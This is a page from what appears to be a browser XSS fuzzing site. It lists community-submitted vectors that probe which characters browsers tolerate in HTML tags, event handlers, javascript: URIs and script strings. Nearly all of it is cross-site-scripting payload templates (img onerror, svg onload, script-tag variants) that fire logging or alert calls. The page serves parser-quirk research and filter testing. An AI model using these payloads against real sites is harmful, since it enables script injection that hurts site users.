Featured vector

Default Browser 0.0
<!-- sample vector --> <img src="xx:xx0x22onerror=alert(1)>

Fuzz vector cloud

3,344,426 Successful fuzzes

Fuzz Vectors

Searching for "char"

Your browser identified as

General Crawlers unknown

All vectors

Description Vector Created by
char after event <!-- sample vector --> <img src=xx:xx onerror*chr*=logChr(*num*)> @chmodxxx
eating char (please god help ) <!-- sample vector --> <img src=x *chr*> onerror=logChr(*num*)> @missoum1307
eating char <!-- sample vector --> <img src=x *chr*> onerror=logChr(*num*)> @missoum1307
img src starts with pound follow by fuzz char then data uri <img src="#*chr*data:image/gif;base64,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"> @MisterJyu
Possibility of XSS via lead bytes <html> <head> <title>Possibility of XSS via lead bytes... @irsdl</title> <!-- <meta charset="utf-8"> or <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> Ref: https://code.google.com/p/doctype-mirror/wiki/MetaCharsetAttribute --> </head> <body> <p><input size=20 value="*chr*"></p> <p><input size=20 value="<script>logChr(*num*)</script>"></p> <!-- References: http://powerofcommunity.net/poc2008/hasegawa.pptx http://websecurity.com.ua/2928/ https://bugzilla.mozilla.org/show_bug.cgi?id=690225 --> </body> </html> @irsdl
replacement *chr*img src=xx:xx onerror=logChr(*num*)> @matttiko
char after lt and before still valid html <*chr*,script>logChr(*num*);</script> @p_laguna
Separators <svg*chr*onload=logChr(*num*)> @JohnathanKuskos
charecter between two URI <a href="http://*chr*javascript:alert(1)">testxss</a> @Mramydnei
Characters allowed before script tag name <*chr*script> logChr(*num*) </script> @tifkin_
allowed char in js comment <script>logChr(*num*)<*chr*!-- '</script> @insertScript
img onload with only one char in src <img src=*chr* onload=logChr(*num*)> @insertScript
char after lt still valid html <*chr*a href=x onerror=logChr(*num*)> @ethicalhack3r
lt eating char log <img src=x *chr*> onerror="console.log(document.getElementsByTagName('html')[0].innerHTML)"> @insertScript
lt eating char v2 <img src=x *chr*> onerror=logChr(*num*)> @insertScript
lt eating char <img src=x *chr*> onerror=logChr(*num*)> @insertScript
chars allowed after colon v2 htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){}; @heyheyheyhey10
chars allowed in colon v2 htmlStr = '<a href="javascript&col'+*chr*+'on;123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){}; @heyheyheyhey10
chars allowed after colon htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*chr*); } }catch(e){}; @heyheyheyhey10
Replacement for s in script tag <*chr*cript>logChr(*num*)</script> @blubbfiction
char for fireing onload event <img src=*chr* onload=logChr(*num*)> @heyheyheyhey10
Char that allows you to act as a slash in closing tag 2 <script>log(*num*)<*chr*script></script> @notxssninja
Char after lt <*chr*script>alert(*num*)</script> @ethicalhack3r
Characters consuming backslashes and breaking JS strings <script>a='abc\*chr*\';log(*num*)//def';</script> @0x6D6172696F